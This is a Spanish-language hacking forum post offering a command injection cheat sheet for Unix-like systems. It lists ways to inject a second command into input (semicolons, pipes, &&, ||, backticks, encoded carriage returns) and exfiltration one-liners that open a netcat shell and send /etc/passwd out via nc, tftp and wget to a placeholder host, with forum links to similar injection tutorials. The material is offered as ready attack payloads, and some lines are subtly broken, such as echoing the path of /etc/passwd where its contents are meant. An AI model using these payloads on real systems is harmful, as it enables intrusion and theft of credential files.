por KHC Usa camisa de fuerza
Like-Unix Command Injection Cheat Sheet

Un corto pero util cheat sheet de comman injection para sistemas like-unix, recordar que "blah" es nuestro comando a inyectar.

Executing Commands

Seperating Commands:

Código: Seleccionar todo

blah;blah2
PIPE:

Código: Seleccionar todo

blah | blah2
PIPEZ:

Código: Seleccionar todo

blah ^ blah2
AND:

Código: Seleccionar todo

blah && blah2
OR:

Código: Seleccionar todo

FAIL || X
OR:

Código: Seleccionar todo

blah%0Dblah2%0Dblah3
Backtick:

Código: Seleccionar todo

`blah`
Background:

Código: Seleccionar todo

`blah & blah2`
Getting Files / Data

FTP:

Código: Seleccionar todo

Make a new text, and echo and then redirect to FTP
NC:

Código: Seleccionar todo

nc -e /bin/sh
NC:

Código: Seleccionar todo

echo /etc/passwd  | nc host port
TFTP:

Código: Seleccionar todo

echo put /etc/passwd | tftp host
WGET:

Código: Seleccionar todo

wget --post-file /etc/passwd
[Enlace externo eliminado para invitados]
1337 & culture!
Temas similares
INF Script Injection Backdoors por xrahitel en Manuales y Tutoriales
VBA Macro Remote Template Injection por xrahitel en Manuales y Tutoriales
CSV Macro Injection Thunderbird por xrahitel en Manuales y Tutoriales
Links sobre el tema
Variantes de tema
Responder

Volver a “General”